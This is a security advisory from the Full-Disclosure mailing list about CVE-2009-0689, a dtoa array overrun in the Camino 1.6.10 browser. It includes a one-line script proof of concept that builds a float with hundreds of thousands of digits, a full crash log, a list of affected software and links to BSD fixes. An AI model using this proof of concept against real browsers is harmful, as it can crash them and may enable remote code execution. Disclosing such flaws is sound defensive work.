[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Camino 1.6.10 Fixed in: - Camino 2.0 <= NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/76 --- 0.Description --- Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source, GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac OS X operating system. In place of an XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes. --- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- ----------------------- <script> var a=0.<?php echo str_repeat("1",296450); ?>; </script> ----------------------- Process: Camino [153] Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino Identifier: org.mozilla.camino Version: 1.6.10 (1609.09.25) Code Type: X86 (Native) Parent Process: launchd [92] Date/Time: 2009-11-06 12:57:24.698 -0800 OS Version: Mac OS X 10.5.6 (9G55) Report Version: 6 Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590 Crashed Thread: 0 Thread 0 Crashed: 0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235 1 libSystem.B.dylib 0x01d7710d szone_malloc + 180 2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81 3 libSystem.B.dylib 0x01d76fac malloc + 55 4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220 5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282 6 org.mozilla.camino 0x0038ae0e nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146 7 org.mozilla.camino 0x0038b215 nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27 8 org.mozilla.camino 0x003afbd0 EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24 9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37 10 org.mozilla.camino 0x003b0c77 nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, nsStyleContext*, nsICSSPseudoComparator*) + 123 11 org.mozilla.camino 0x002cc924 nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134 12 org.mozilla.camino 0x002f617b PresShell::InitialReflow(int, int) + 1151 13 org.mozilla.camino 0x005a90d4 nsContentSink::StartLayout(int) + 342 14 org.mozilla.camino 0x00483354 HTMLContentSink::StartLayout() + 82 15 org.mozilla.camino 0x00486cb7 HTMLContentSink::OpenBody(nsIParserNode const&) + 193 16 org.mozilla.camino 0x001a60e8 CNavDTD::OpenBody(nsCParserNode const*) + 54 17 org.mozilla.camino 0x001a8b53 CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393 18 org.mozilla.camino 0x001aa3e5 CNavDTD::HandleStartToken(CToken*) + 623 19 org.mozilla.camino 0x001aaaa2 CNavDTD::HandleToken(CToken*, nsIParser*) + 1358 20 org.mozilla.camino 0x001a9a4d CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, nsIContentSink*) + 165 21 org.mozilla.camino 0x001a94ee CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550 22 org.mozilla.camino 0x001b5e28 nsParser::DidBuildModel(unsigned int) + 90 23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, int, int) + 661 24 org.mozilla.camino 0x001b59a8 nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128 25 org.mozilla.camino 0x002076a0 nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 88 26 org.mozilla.camino 0x000f522a nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78 27 org.mozilla.camino 0x000baf18 nsInputStreamPump::OnStateStop() + 88 28 org.mozilla.camino 0x000bb49d nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133 29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process() + 751 30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21 31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103 32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141 33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88 34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode + 283 35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374 36 com.apple.HIToolbox 0x02d8af4d BlockUntilNextEventMatchingListInMode + 106 37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657 38 com.apple.AppKit 0x05e94630 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128 39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795 40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574 41 org.mozilla.camino 0x0000364c main + 196 42 org.mozilla.camino 0x00002f1e _start + 216 43 org.mozilla.camino 0x00002e45 start + 41 Thread 1: 0 libSystem.B.dylib 0x01dad30a select$DARWIN_EXTSN$NOCANCEL + 10 1 libnspr4.dylib 0x00d3940e poll + 258 2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134 3 org.mozilla.camino 0x000cb897 nsSocketTransportService::Poll(unsigned int*) + 99 4 org.mozilla.camino 0x000cbe75 nsSocketTransportService::Run() + 497 5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41 6 libnspr4.dylib 0x00d37309 _pt_root + 150 7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 8 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 2: 0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10 1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74 6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41 7 libnspr4.dylib 0x00d37309 _pt_root + 150 8 libSystem.B.dylib 0x01da7095 _pthread_start + 321 9 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 3: 0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10 1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145 6 libnspr4.dylib 0x00d37309 _pt_root + 150 7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 8 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 4: 0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10 1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 + 73 2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54 3 libSystem.B.dylib 0x01da7095 _pthread_start + 321 4 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 5: 0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10 1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 5 org.mozilla.camino 0x000d43ce nsHostResolver::GetHostToLookup(nsHostRecord**) + 212 6 org.mozilla.camino 0x000d4b2d nsHostResolver::ThreadFunc(void*) + 123 7 libnspr4.dylib 0x00d37309 _pt_root + 150 8 libSystem.B.dylib 0x01da7095 _pthread_start + 321 9 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 6: 0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10 1 libSystem.B.dylib 0x01da7095 _pthread_start + 321 2 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 7: 0 libSystem.B.dylib 0x01d76226 semaphore_timedwait_signal_trap + 10 1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 5 org.mozilla.camino 0x000b539d nsIOThreadPool::ThreadFunc(void*) + 145 6 libnspr4.dylib 0x00d37309 _pt_root + 150 7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 8 libSystem.B.dylib 0x01da6f52 thread_start + 34 Thread 0 crashed with X86 Thread State (32-bit): eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590 edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190 ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017 ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 cr2: 0x7e33d590 --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - OpenBSD - NetBSD - FreeBSD - MacOSX - Google Chrome - Mozilla Firefox - Mozilla Seamonkey - Mozilla Thunderbird - Mozilla Sunbird - Mozilla Camino - KDE (example: konqueror) - Opera - K-Meleon - F-Lock This list is not yet closed. --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c --- 5. Credits --- Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. --- 6. Greets --- Infospec p_e_a pi3 --- 7. Contact --- Email: - cxib {a.t] securityreason [d0t} com - sp3x {a.t] securityreason [d0t} com GPG: - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg - http://securityreason.com/key/sp3x.gpg http://securityreason.com/ http://securityreason.pl/
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/